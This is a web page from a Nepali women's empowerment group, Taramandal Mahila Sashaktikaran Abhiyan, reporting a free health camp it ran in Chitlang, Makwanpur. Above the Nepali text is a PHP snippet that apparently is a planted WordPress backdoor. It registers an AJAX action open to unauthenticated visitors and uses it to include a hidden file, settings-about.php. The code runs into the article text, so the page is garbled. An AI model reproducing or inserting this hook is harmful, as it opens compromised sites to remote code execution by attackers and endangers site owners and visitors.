if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } स्वास्थ्य शिविर | Taramandal Mahila Sashaktikaran Abhiyan

सस्थाले निशुल्क स्वास्थ्य शिविरका लागि चित्लाङ्ग स्वास्थ्य चौकि, आर.सि.सि रोटरि क्लब तथा अन्य सहयोग गर्ने सामाजिक सस्थाहरुसंग समन्वयन गरि मकवानपुर जिल्ला अन्तर्गत चित्लाङ्गमा बिभिन्न रोग लगायत बृहत स्वास्थ्य शिविर मिति २०७३।०९।११ र १२ गते सन्चालन गरियो । शिविरको मुख्य उद्देश्य पिछडिएको तथा आर्थिक स्थिति नाजुक भै उपचार गर्न नसकेका समुदायमा उपचार सहयोग गर्नु रहेको थियो ।